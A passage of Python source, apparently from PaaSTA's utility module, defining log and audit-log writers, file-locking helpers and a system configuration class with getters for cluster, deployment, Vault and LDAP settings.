_log_writer = LogWriterClass(**log_writer_config.get("options", {}))
def _log(
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
return _log_writer.log(
service=service,
line=line,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_audit(
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
user = get_username()
host = get_hostname()
return _log_writer.log_audit(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
def _now() -> str:
return datetime.datetime.utcnow().isoformat()
def remove_ansi_escape_sequences(line: str) -> str:
"""Removes ansi escape sequences from the given line."""
return no_escape.sub("", line)
def format_log_line(
level: str,
cluster: str,
service: str,
instance: str,
component: str,
line: str,
timestamp: str = None,
) -> str:
"""Accepts a string 'line'.
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains 'line'.
"""
validate_log_component(component)
if not timestamp:
timestamp = _now()
line = remove_ansi_escape_sequences(line.strip())
message = json.dumps(
{
"timestamp": timestamp,
"level": level,
"cluster": cluster,
"service": service,
"instance": instance,
"component": component,
"message": line,
},
sort_keys=True,
)
return message
def format_audit_log_line(
cluster: str,
instance: str,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
timestamp: str = None,
) -> str:
"""Accepts:
* a string 'user' describing the user that initiated the action
* a string 'host' describing the server where the user initiated the action
* a string 'action' describing an action performed by paasta_tools
* a dict 'action_details' optional information about the action
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains details about an action performed on
a service/instance.
"""
if not timestamp:
timestamp = _now()
if not action_details:
action_details = {}
message = json.dumps(
{
"timestamp": timestamp,
"cluster": cluster,
"service": service,
"instance": instance,
"user": user,
"host": host,
"action": action,
"action_details": action_details,
},
sort_keys=True,
)
return message
def get_log_name_for_service(service: str, prefix: str = None) -> str:
if prefix:
return f"stream_paasta_{prefix}_{service}"
return "stream_paasta_%s" % service
try:
import clog
# Somehow clog turns on DeprecationWarnings, so we need to disable them
# again after importing it.
warnings.filterwarnings("ignore", category=DeprecationWarning)
class CLogWriter(LogWriter):
def __init__(self, **kwargs: Any):
clog.config.configure(**kwargs)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
"""This expects someone (currently the paasta cli main()) to have already
configured the log object. We'll just write things to it.
"""
if level == "event":
print(f"[service {service}] {line}", file=sys.stdout)
elif level == "debug":
print(f"[service {service}] {line}", file=sys.stderr)
else:
raise NoSuchLogLevel
log_name = get_log_name_for_service(service)
formatted_line = format_log_line(
level, cluster, service, instance, component, line
)
clog.log_line(log_name, formatted_line)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
log_name = AUDIT_LOG_STREAM
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
clog.log_line(log_name, formatted_line)
@register_log_writer("monk")
class MonkLogWriter(CLogWriter):
def __init__(
self,
monk_host: str = "169.254.255.254",
monk_port: int = 1473,
monk_disable: bool = False,
**kwargs: Any,
) -> None:
super().__init__(
monk_host=monk_host, monk_port=monk_port, monk_disable=monk_disable,
)
@register_log_writer("scribe")
class ScribeLogWriter(CLogWriter):
def __init__(
self,
scribe_host: str = "169.254.255.254",
scribe_port: int = 1463,
scribe_disable: bool = False,
**kwargs: Any,
) -> None:
super().__init__(
scribe_host=scribe_host,
scribe_port=scribe_port,
scribe_disable=scribe_disable,
)
except ImportError:
warnings.warn("clog is unavailable")
@register_log_writer("null")
class NullLogWriter(LogWriter):
"""A LogWriter class that doesn't do anything. Primarily useful for integration tests where we don't care about
logs."""
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
@contextlib.contextmanager
def _empty_context() -> Iterator[None]:
yield
_AnyIO = Union[io.IOBase, IO]
@register_log_writer("file")
class FileLogWriter(LogWriter):
def __init__(
self,
path_format: str,
mode: str = "a+",
line_delimiter: str = "\n",
flock: bool = False,
) -> None:
self.path_format = path_format
self.mode = mode
self.flock = flock
self.line_delimiter = line_delimiter
def maybe_flock(self, fd: _AnyIO) -> ContextManager:
if self.flock:
# https://github.com/python/typeshed/issues/1548
return flock(fd)
else:
return _empty_context()
def format_path(
self, service: str, component: str, level: str, cluster: str, instance: str
) -> str:
return self.path_format.format(
service=service,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_message(self, path: str, message: str) -> None:
# We use io.FileIO here because it guarantees that write() is implemented with a single write syscall,
# and on Linux, writes to O_APPEND files with a single write syscall are atomic.
#
# https://docs.python.org/2/library/io.html#io.FileIO
# http://article.gmane.org/gmane.linux.kernel/43445
try:
with io.FileIO(path, mode=self.mode, closefd=True) as f:
with self.maybe_flock(f):
f.write(message.encode("UTF-8"))
except IOError as e:
print(
"Could not log to {}: {}: {} -- would have logged: {}".format(
path, type(e).__name__, str(e), message
),
file=sys.stderr,
)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(service, component, level, cluster, instance)
to_write = "{}{}".format(
format_log_line(level, cluster, service, instance, component, line),
self.line_delimiter,
)
self._log_message(path, to_write)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(AUDIT_LOG_STREAM, "", "", cluster, instance)
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
to_write = f"{formatted_line}{self.line_delimiter}"
self._log_message(path, to_write)
@contextlib.contextmanager
def flock(fd: _AnyIO) -> Iterator[None]:
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX)
yield
finally:
fcntl.flock(fd.fileno(), fcntl.LOCK_UN)
@contextlib.contextmanager
def timed_flock(fd: _AnyIO, seconds: int = 1) -> Iterator[None]:
""" Attempt to grab an exclusive flock with a timeout. Uses Timeout, so will
raise a TimeoutError if `seconds` elapses before the flock can be obtained
"""
# We don't want to wrap the user code in the timeout, just the flock grab
flock_context = flock(fd)
with Timeout(seconds=seconds):
flock_context.__enter__()
try:
yield
finally:
flock_context.__exit__(*sys.exc_info())
def _timeout(process: Popen) -> None:
"""Helper function for _run. It terminates the process.
Doesn't raise OSError, if we try to terminate a non-existing
process as there can be a very small window between poll() and kill()
"""
if process.poll() is None:
try:
# sending SIGKILL to the process
process.kill()
except OSError as e:
# No such process error
# The process could have been terminated meanwhile
if e.errno != errno.ESRCH:
raise
class PaastaNotConfiguredError(Exception):
pass
class NoConfigurationForServiceError(Exception):
pass
def get_readable_files_in_glob(glob: str, path: str) -> List[str]:
"""
Returns a sorted list of files that are readable in an input glob by recursively searching a path
"""
globbed_files = []
for root, dirs, files in os.walk(path):
for f in files:
fn = os.path.join(root, f)
if os.path.isfile(fn) and os.access(fn, os.R_OK) and fnmatch(fn, glob):
globbed_files.append(fn)
return sorted(globbed_files)
class ClusterAutoscalingResource(TypedDict):
type: str
id: str
region: str
pool: str
min_capacity: int
max_capacity: int
IdToClusterAutoscalingResourcesDict = Dict[str, ClusterAutoscalingResource]
class ResourcePoolSettings(TypedDict):
target_utilization: float
drain_timeout: int
PoolToResourcePoolSettingsDict = Dict[str, ResourcePoolSettings]
class MarathonConfigDict(TypedDict, total=False):
user: str
password: str
url: List[str]
class LocalRunConfig(TypedDict, total=False):
default_cluster: str
class RemoteRunConfig(TypedDict, total=False):
default_role: str
class SparkRunConfig(TypedDict, total=False):
default_cluster: str
default_pool: str
class PaastaNativeConfig(TypedDict, total=False):
principal: str
secret: str
ExpectedSlaveAttributes = List[Dict[str, Any]]
class KubeKindDict(TypedDict, total=False):
singular: str
plural: str
class KubeCustomResourceDict(TypedDict, total=False):
version: str
file_prefix: str
kube_kind: KubeKindDict
group: str
class KubeStateMetricsCollectorConfigDict(TypedDict, total=False):
unaggregated_metrics: List[str]
summed_metric_to_group_keys: Dict[str, List[str]]
label_metric_to_label_key: Dict[str, List[str]]
label_renames: Dict[str, str]
class SystemPaastaConfigDict(TypedDict, total=False):
api_endpoints: Dict[str, str]
auth_certificate_ttl: str
auto_config_instance_types_enabled: Dict[str, bool]
auto_hostname_unique_size: int
boost_regions: List[str]
cluster_autoscaler_max_decrease: float
cluster_autoscaler_max_increase: float
cluster_autoscaling_draining_enabled: bool
cluster_autoscaling_resources: IdToClusterAutoscalingResourcesDict
cluster_boost_enabled: bool
cluster_fqdn_format: str
clusters: Sequence[str]
cluster: str
dashboard_links: Dict[str, Dict[str, str]]
default_push_groups: List
default_should_run_uwsgi_exporter_sidecar: bool
deploy_blacklist: UnsafeDeployBlacklist
deployd_big_bounce_deadline: float
deployd_log_level: str
deployd_maintenance_polling_frequency: int
deployd_max_service_instance_failures: int
deployd_metrics_provider: str
deployd_number_workers: int
deployd_startup_bounce_deadline: float
deployd_startup_oracle_enabled: bool
deployd_use_zk_queue: bool
deployd_worker_failure_backoff_factor: int
deploy_whitelist: UnsafeDeployWhitelist
disabled_watchers: List
dockercfg_location: str
docker_registry: str
enable_client_cert_auth: bool
enable_nerve_readiness_check: bool
enable_envoy_readiness_check: bool
enforce_disk_quota: bool
envoy_admin_domain_name: str
envoy_admin_endpoint_format: str
envoy_nerve_readiness_check_script: List[str]
envoy_readiness_check_script: List[str]
expected_slave_attributes: ExpectedSlaveAttributes
filter_bogus_mesos_cputime_enabled: bool
fsm_template: str
git_config: Dict
hacheck_sidecar_image_url: str
hacheck_sidecar_volumes: List[DockerVolume]
kubernetes_add_registration_labels: bool
kubernetes_custom_resources: List[KubeCustomResourceDict]
kubernetes_use_hacheck_sidecar: bool
ldap_host: str
ldap_reader_password: str
ldap_reader_username: str
ldap_search_base: str
ldap_search_ou: str
local_run_config: LocalRunConfig
log_reader: LogReaderConfig
log_writer: LogWriterConfig
maintenance_resource_reservation_enabled: bool
marathon_servers: List[MarathonConfigDict]
mark_for_deployment_max_polling_threads: int
mark_for_deployment_default_polling_interval: float
mark_for_deployment_default_diagnosis_interval: float
mark_for_deployment_default_default_time_before_first_diagnosis: float
mark_for_deployment_should_ping_for_unhealthy_pods: bool
mesos_config: Dict
metrics_provider: str
monitoring_config: Dict
nerve_readiness_check_script: List[str]
paasta_native: PaastaNativeConfig
paasta_status_version: str
pdb_max_unavailable: Union[str, int]
pki_backend: str
pod_defaults: Dict[str, Any]
previous_marathon_servers: List[MarathonConfigDict]
register_k8s_pods: bool
register_marathon_services: bool
register_native_services: bool
remote_run_config: RemoteRunConfig
resource_pool_settings: PoolToResourcePoolSettingsDict
secret_provider: str
security_check_command: str
sensu_host: str
sensu_port: int
service_discovery_providers: Dict[str, Any]
slack: Dict[str, str]
spark_run_config: SparkRunConfig
supported_storage_classes: Sequence[str]
synapse_haproxy_url_format: str
synapse_host: str
synapse_port: int
taskproc: Dict
tron: Dict
uwsgi_exporter_sidecar_image_url: str
vault_cluster_map: Dict
vault_environment: str
volumes: List[DockerVolume]
zookeeper: str
def load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Reads Paasta configs in specified directory in lexicographical order and deep merges
the dictionaries (last file wins).
"""
if not os.path.isdir(path):
raise PaastaNotConfiguredError(
"Could not find system paasta configuration directory: %s" % path
)
if not os.access(path, os.R_OK):
raise PaastaNotConfiguredError(
"Could not read from system paasta configuration directory: %s" % path
)
try:
file_stats = frozenset(
{
(fn, os.stat(fn))
for fn in get_readable_files_in_glob(glob="*.json", path=path)
}
)
return parse_system_paasta_config(file_stats, path)
except IOError as e:
raise PaastaNotConfiguredError(
f"Could not load system paasta config file {e.filename}: {e.strerror}"
)
def optionally_load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Tries to load the system paasta config, but will return an empty configuration if not available,
without raising.
"""
try:
return load_system_paasta_config(path=path)
except PaastaNotConfiguredError:
return SystemPaastaConfig({}, "")
@lru_cache()
def parse_system_paasta_config(
file_stats: FrozenSet[Tuple[str, os.stat_result]], path: str
) -> "SystemPaastaConfig":
"""Pass in a dictionary of filename -> os.stat_result, and this returns the merged parsed configs"""
config: SystemPaastaConfigDict = {}
for filename, _ in file_stats:
with open(filename) as f:
config = deep_merge_dictionaries(
json.load(f), config, allow_duplicate_keys=False
)
return SystemPaastaConfig(config, path)
class SystemPaastaConfig:
def __init__(self, config: SystemPaastaConfigDict, directory: str) -> None:
self.directory = directory
self.config_dict = config
def __eq__(self, other: Any) -> bool:
if isinstance(other, SystemPaastaConfig):
return (
self.directory == other.directory
and self.config_dict == other.config_dict
)
return False
def __repr__(self) -> str:
return f"SystemPaastaConfig({self.config_dict!r}, {self.directory!r})"
def get_zk_hosts(self) -> str:
"""Get the zk_hosts defined in this hosts's cluster config file.
Strips off the zk:// prefix, if it exists, for use with Kazoo.
:returns: The zk_hosts specified in the paasta configuration
"""
try:
hosts = self.config_dict["zookeeper"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find zookeeper connection string in configuration directory: %s"
% self.directory
)
# how do python strings not have a method for doing this
if hosts.startswith("zk://"):
return hosts[len("zk://") :]
return hosts
def get_system_docker_registry(self) -> str:
"""Get the docker_registry defined in this host's cluster config file.
:returns: The docker_registry specified in the paasta configuration
"""
try:
return self.config_dict["docker_registry"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find docker registry in configuration directory: %s"
% self.directory
)
def get_hacheck_sidecar_volumes(self) -> List[DockerVolume]:
"""Get the hacheck sidecar volumes defined in this host's hacheck_sidecar_volumes config file.
:returns: The list of volumes specified in the paasta configuration
"""
try:
volumes = self.config_dict["hacheck_sidecar_volumes"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find hacheck_sidecar_volumes in configuration directory: %s"
% self.directory
)
return _reorder_docker_volumes(list(volumes))
def get_volumes(self) -> Sequence[DockerVolume]:
"""Get the volumes defined in this host's volumes config file.
:returns: The list of volumes specified in the paasta configuration
"""
try:
return self.config_dict["volumes"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find volumes in configuration directory: %s" % self.directory
)
def get_cluster(self) -> str:
"""Get the cluster defined in this host's cluster config file.
:returns: The name of the cluster defined in the paasta configuration
"""
try:
return self.config_dict["cluster"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find cluster in configuration directory: %s" % self.directory
)
def get_dashboard_links(self) -> Mapping[str, Mapping[str, str]]:
return self.config_dict["dashboard_links"]
def get_auto_hostname_unique_size(self) -> int:
"""
We automatically add a ["hostname", "UNIQUE"] constraint to "small" services running in production clusters.
If there are less than or equal to this number of instances, we consider it small.
We fail safe and return -1 to avoid adding the ['hostname', 'UNIQUE'] constraint if this value is not defined
:returns: The integer size of a small service
"""
return self.config_dict.get("auto_hostname_unique_size", -1)
def get_auto_config_instance_types_enabled(self) -> Dict[str, bool]:
return self.config_dict.get("auto_config_instance_types_enabled", {})
def get_api_endpoints(self) -> Mapping[str, str]:
return self.config_dict["api_endpoints"]
def get_enable_client_cert_auth(self) -> bool:
"""
If enabled present a client certificate from ~/.paasta/pki/<cluster>.crt and ~/.paasta/pki/<cluster>.key
"""
return self.config_dict.get("enable_client_cert_auth", True)
def get_enable_nerve_readiness_check(self) -> bool:
"""
If enabled perform readiness checks on nerve
"""
return self.config_dict.get("enable_nerve_readiness_check", True)
def get_enable_envoy_readiness_check(self) -> bool:
"""
If enabled perform readiness checks on envoy
"""
return self.config_dict.get("enable_envoy_readiness_check", False)
def get_nerve_readiness_check_script(self) -> List[str]:
return self.config_dict.get(
"nerve_readiness_check_script", ["/check_smartstack_up.sh"]
)
def get_envoy_readiness_check_script(self) -> List[str]:
return self.config_dict.get(
"envoy_readiness_check_script",
["/check_proxy_up.sh", "--enable-envoy", "--envoy-check-mode", "eds-dir"],
)
def get_envoy_nerve_readiness_check_script(self) -> List[str]:
return self.config_dict.get(
"envoy_nerve_readiness_check_script",
["/check_proxy_up.sh", "--enable-smartstack", "--enable-envoy"],
)
def get_enforce_disk_quota(self) -> bool:
"""
If enabled, add `--storage-opt size=SIZE` arg to `docker run` calls,
enforcing the disk quota as a result.
Please note that this should be enabled only for a suported environment
(which at the moment is only `overlay2` driver backed by `XFS`
filesystem mounted with `prjquota` option) otherwise Docker will fail
to start.
"""
return self.config_dict.get("enforce_disk_quota", False)
def get_auth_certificate_ttl(self) -> str:
"""
How long to request for ttl on auth certificates. Note that this maybe limited
by policy in Vault
"""
return self.config_dict.get("auth_certificate_ttl", "11h")
def get_pki_backend(self) -> str:
"""
The Vault pki backend to use for issueing certificates
"""
return self.config_dict.get("pki_backend", "paastaca")
def get_fsm_template(self) -> str:
fsm_path = os.path.dirname(paasta_tools.cli.fsm.__file__)
template_path = os.path.join(fsm_path, "template")
return self.config_dict.get("fsm_template", template_path)
def get_log_writer(self) -> LogWriterConfig:
"""Get the log_writer configuration out of global paasta config
:returns: The log_writer dictionary.
"""
try:
return self.config_dict["log_writer"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_writer in configuration directory: %s"
% self.directory
)
def get_log_reader(self) -> LogReaderConfig:
"""Get the log_reader configuration out of global paasta config
:returns: the log_reader dictionary.
"""
try:
return self.config_dict["log_reader"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_reader in configuration directory: %s"
% self.directory
)
def get_metrics_provider(self) -> Optional[str]:
"""Get the metrics_provider configuration out of global paasta config
:returns: A string identifying the metrics_provider
"""
deployd_metrics_provider = self.config_dict.get("deployd_metrics_provider")
if deployd_metrics_provider is not None:
return deployd_metrics_provider
return self.config_dict.get("metrics_provider")
def get_deployd_worker_failure_backoff_factor(self) -> int:
"""Get the factor for calculating exponential backoff when a deployd worker
fails to bounce a service
:returns: An integer
"""
return self.config_dict.get("deployd_worker_failure_backoff_factor", 30)
def get_deployd_maintenance_polling_frequency(self) -> int:
"""Get the frequency in seconds that the deployd maintenance watcher should
poll mesos's api for new draining hosts
:returns: An integer
"""
return self.config_dict.get("deployd_maintenance_polling_frequency", 30)
def get_deployd_startup_oracle_enabled(self) -> bool:
"""This controls whether deployd will add all services that need a bounce on
startup. Generally this is desirable behavior. If you are performing a bounce
of *all* services you will want to disable this.
:returns: A boolean
"""
return self.config_dict.get("deployd_startup_oracle_enabled", True)
def get_deployd_max_service_instance_failures(self) -> int:
"""Determines how many times a service instance entry in deployd's queue
can fail before it will be removed from the queue.
:returns: An integer
"""
return self.config_dict.get("deployd_max_service_instance_failures", 20)
def get_sensu_host(self) -> str:
"""Get the host that we should send sensu events to.
:returns: the sensu_host string, or localhost if not specified.
"""
return self.config_dict.get("sensu_host", "localhost")
def get_sensu_port(self) -> int:
"""Get the port that we should send sensu events to.
:returns: the sensu_port value as an integer, or 3030 if not specified.
"""
return int(self.config_dict.get("sensu_port", 3030))
def get_dockercfg_location(self) -> str:
"""Get the location of the dockerfile, as a URI.
:returns: the URI specified, or file:///root/.dockercfg if not specified.
"""
return self.config_dict.get("dockercfg_location", DEFAULT_DOCKERCFG_LOCATION)
def get_synapse_port(self) -> int:
"""Get the port that haproxy-synapse exposes its status on. Defaults to 3212.
:returns: the haproxy-synapse status port."""
return int(self.config_dict.get("synapse_port", 3212))
def get_default_synapse_host(self) -> str:
"""Get the default host we should interrogate for haproxy-synapse state.
:returns: A hostname that is running haproxy-synapse."""
return self.config_dict.get("synapse_host", "localhost")
def get_synapse_haproxy_url_format(self) -> str:
"""Get a format string for the URL to query for haproxy-synapse state. This format string gets two keyword
arguments, host and port. Defaults to "http://{host:s}:{port:d}/;csv;norefresh".
:returns: A format string for constructing the URL of haproxy-synapse's status page."""
return self.config_dict.get(
"synapse_haproxy_url_format", DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT
)
def get_service_discovery_providers(self) -> Dict[str, Any]:
return self.config_dict.get("service_discovery_providers", {})
def get_cluster_autoscaling_resources(self) -> IdToClusterAutoscalingResourcesDict:
return self.config_dict.get("cluster_autoscaling_resources", {})
def get_cluster_autoscaling_draining_enabled(self) -> bool:
""" Enable mesos maintenance mode and trigger draining of instances before the
autoscaler terminates the instance.
:returns A bool"""
return self.config_dict.get("cluster_autoscaling_draining_enabled", True)
def get_cluster_autoscaler_max_increase(self) -> float:
""" Set the maximum increase that the cluster autoscaler can make in each run
:returns A float"""
return self.config_dict.get("cluster_autoscaler_max_increase", 0.2)
def get_cluster_autoscaler_max_decrease(self) -> float:
""" Set the maximum decrease that the cluster autoscaler can make in each run
:returns A float"""
return self.config_dict.get("cluster_autoscaler_max_decrease", 0.1)
def get_maintenance_resource_reservation_enabled(self) -> bool:
""" Enable un/reserving of resources when we un/drain a host in mesos maintenance
*and* after tasks are killed in setup_marathon_job etc.
:returns A bool"""
return self.config_dict.get("maintenance_resource_reservation_enabled", True)
def get_cluster_boost_enabled(self) -> bool:
""" Enable the cluster boost. Note that the boost only applies to the CPUs.
If the boost is toggled on here but not configured, it will be transparent.
:returns A bool: True means cluster boost is enabled."""
return self.config_dict.get("cluster_boost_enabled", False)
def get_resource_pool_settings(self) -> PoolToResourcePoolSettingsDict:
return self.config_dict.get("resource_pool_settings", {})
def get_cluster_fqdn_format(self) -> str:
"""Get a format string that constructs a DNS name pointing at the paasta masters in a cluster. This format
string gets one parameter: cluster. Defaults to 'paasta-{cluster:s}.yelp'.
:returns: A format string for constructing the FQDN of the masters in a given cluster."""
return self.config_dict.get("cluster_fqdn_format", "paasta-{cluster:s}.yelp")
def get_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("marathon_servers", [])
def get_previous_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("previous_marathon_servers", [])
def get_paasta_status_version(self) -> str:
"""Get paasta status version string (new | old). Defaults to 'old'.
:returns: A string with the version desired version of paasta status."""
return self.config_dict.get("paasta_status_version", "old")
def get_local_run_config(self) -> LocalRunConfig:
"""Get the local-run config
:returns: The local-run job config dictionary"""
return self.config_dict.get("local_run_config", {})
def get_remote_run_config(self) -> RemoteRunConfig:
"""Get the remote-run config
:returns: The remote-run system_paasta_config dictionary"""
return self.config_dict.get("remote_run_config", {})
def get_spark_run_config(self) -> SparkRunConfig:
"""Get the spark-run config
:returns: The spark-run system_paasta_config dictionary"""
return self.config_dict.get("spark_run_config", {})
def get_paasta_native_config(self) -> PaastaNativeConfig:
return self.config_dict.get("paasta_native", {})
def get_mesos_cli_config(self) -> Dict:
"""Get the config for mesos-cli
:returns: The mesos cli config
"""
return self.config_dict.get("mesos_config", {})
def get_monitoring_config(self) -> Dict:
"""Get the monitoring config
:returns: the monitoring config dictionary"""
return self.config_dict.get("monitoring_config", {})
def get_deploy_blacklist(self) -> DeployBlacklist:
"""Get global blacklist. This applies to all services
in the cluster
:returns: The blacklist
"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""Get global whitelist. This applies to all services
in the cluster
:returns: The whitelist
"""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_expected_slave_attributes(self) -> ExpectedSlaveAttributes:
"""Return a list of dictionaries, representing the expected combinations of attributes in this cluster. Used for
calculating the default routing constraints."""
return self.config_dict.get("expected_slave_attributes")
def get_security_check_command(self) -> Optional[str]:
"""Get the script to be executed during the security-check build step
:return: The name of the file
"""
return self.config_dict.get("security_check_command", None)
def get_deployd_number_workers(self) -> int:
"""Get the number of workers to consume deployment q
:return: integer
"""
return self.config_dict.get("deployd_number_workers", 4)
def get_deployd_big_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances for SystemPaastaConfig
changes.
:return: float
"""
return float(
self.config_dict.get("deployd_big_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_startup_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances on deployd startup.
:return: float
"""
return float(
self.config_dict.get("deployd_startup_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_log_level(self) -> str:
"""Get the log level for paasta-deployd
:return: string name of python logging level, e.g. INFO, DEBUG etc.
"""
return self.config_dict.get("deployd_log_level", "INFO")
def get_deployd_use_zk_queue(self) -> bool:
return self.config_dict.get("deployd_use_zk_queue", True)
def get_hacheck_sidecar_image_url(self) -> str:
"""Get the docker image URL for the hacheck sidecar container"""
return self.config_dict.get("hacheck_sidecar_image_url")
def get_register_k8s_pods(self) -> bool:
"""Enable registration of k8s services in nerve"""
return self.config_dict.get("register_k8s_pods", False)
def get_kubernetes_add_registration_labels(self) -> bool:
return self.config_dict.get("kubernetes_add_registration_labels", False)
def get_kubernetes_custom_resources(self) -> Sequence[KubeCustomResourceDict]:
"""List of custom resources that should be synced by setup_kubernetes_cr """
return self.config_dict.get("kubernetes_custom_resources", [])
def get_kubernetes_use_hacheck_sidecar(self) -> bool:
return self.config_dict.get("kubernetes_use_hacheck_sidecar", True)
def get_register_marathon_services(self) -> bool:
"""Enable registration of marathon services in nerve"""
return self.config_dict.get("register_marathon_services", True)
def get_register_native_services(self) -> bool:
"""Enable registration of native paasta services in nerve"""
return self.config_dict.get("register_native_services", False)
def get_taskproc(self) -> Dict:
return self.config_dict.get("taskproc", {})
def get_disabled_watchers(self) -> List:
return self.config_dict.get("disabled_watchers", [])
def get_vault_environment(self) -> Optional[str]:
""" Get the environment name for the vault cluster
This must match the environment keys in the secret json files
used by all services in this cluster"""
return self.config_dict.get("vault_environment")
def get_vault_cluster_config(self) -> dict:
""" Get a map from paasta_cluster to vault ecosystem. We need
this because not every ecosystem will have its own vault cluster"""
return self.config_dict.get("vault_cluster_map", {})
def get_secret_provider_name(self) -> str:
""" Get the name for the configured secret_provider, used to
decrypt secrets"""
return self.config_dict.get("secret_provider", "paasta_tools.secret_providers")
def get_slack_token(self) -> str:
""" Get a slack token for slack notifications. Returns None if there is
none available """
return self.config_dict.get("slack", {}).get("token", None)
def get_tron_config(self) -> dict:
return self.config_dict.get("tron", {})
def get_clusters(self) -> Sequence[str]:
return self.config_dict.get("clusters", [])
def get_supported_storage_classes(self) -> Sequence[str]:
return self.config_dict.get("supported_storage_classes", [])
def get_envoy_admin_endpoint_format(self) -> str:
""" Get the format string for Envoy's admin interface. """
return self.config_dict.get(
"envoy_admin_endpoint_format", "http://{host:s}:{port:d}/{endpoint:s}"
)
def get_envoy_admin_port(self) -> int:
""" Get the port that Envoy's admin interface is listening on
from /etc/services. """
return socket.getservbyname(
self.config_dict.get("envoy_admin_domain_name", "envoy-admin")
)
def get_pdb_max_unavailable(self) -> Union[str, int]:
return self.config_dict.get("pdb_max_unavailable", 0)
def get_boost_regions(self) -> List[str]:
return self.config_dict.get("boost_regions", [])
def get_pod_defaults(self) -> Dict[str, Any]:
return self.config_dict.get("pod_defaults", {})
def get_ldap_search_base(self) -> str:
return self.config_dict.get("ldap_search_base", None)
def get_ldap_search_ou(self) -> str:
return self.config_dict.get("ldap_search_ou", None)
def get_ldap_host(self) -> str:
return self.config_dict.get("ldap_host", None)
def get_ldap_reader_username(self) -> str:
return self.config_dict.get("ldap_reader_username", None)
def get_ldap_reader_password(self) -> str:
return self.config_dict.get("ldap_reader_password", None)
def get_default_push_groups(self) -> List:
return self.config_dict.get("default_push_groups", None)
def get_git_config(self) -> Dict:
"""Gets git configuration. Includes repo names and their git servers.
:returns: the git config dict
"""
return self.config_dict.get(
"git_config",
{
"git_user": "git",
"repos": {
"yelpsoa-configs": {
"repo_name": "yelpsoa-configs",
"git_server": DEFAULT_SOA_CONFIGS_GIT_URL,
"deploy_server": DEFAULT_SOA_CONFIGS_GIT_URL,
},
},
},
)
def get_git_repo_config(self, repo_name: str) -> Dict:
"""Gets the git configuration for a specific repo.
:returns: the git config dict for a specific repo.
"""
return self.get_git_config().get("repos", {}).get(repo_name, {})
def get_uwsgi_exporter_sidecar_image_url(self) -> str:
"""Get the docker image URL for the uwsgi_exporter sidecar container"""
return self.config_dict.get(
"uwsgi_exporter_sidecar_image_url",
"docker-paasta.yelpcorp.com:443/uwsgi_exporter-k8s-sidecar:v1.0.0-yelp2",
)
def default_should_run_uwsgi_exporter_sidecar(self) -> bool:
return self.config_dict.get("default_should_run_uwsgi_exporter_sidecar", False)
def get_mark_for_deployment_max_polling_threads(self) -> int:
return self.config_dict.get("mark_for_deployment_max_polling_threads", 4)
def get_mark_for_deployment_default_polling_interval(self) -> float:
return self.config_dict.get("mark_for_deployment_default_polling_interval", 60)
def get_mark_for_deployment_default_diagnosis_interval(self) -> float:
return self.config_dict.get(
"mark_for_deployment_default_diagnosis_interval", 60
)
def get_mark_for_deployment_default_time_before_first_diagnosis(self) -> float:
return self.config_dict.get(
"mark_for_deployment_default_default_time_before_first_diagnosis", 300
)
def get_mark_for_deployment_should_ping_for_unhealthy_pods(self) -> bool:
return self.config_dict.get(
"mark_for_deployment_should_ping_for_unhealthy_pods", True
)
def _run(
command: Union[str, List[str]],
env: Mapping[str, str] = os.environ,
timeout: float = None,
log: bool = False,
stream: bool = False,
stdin: Any = None,
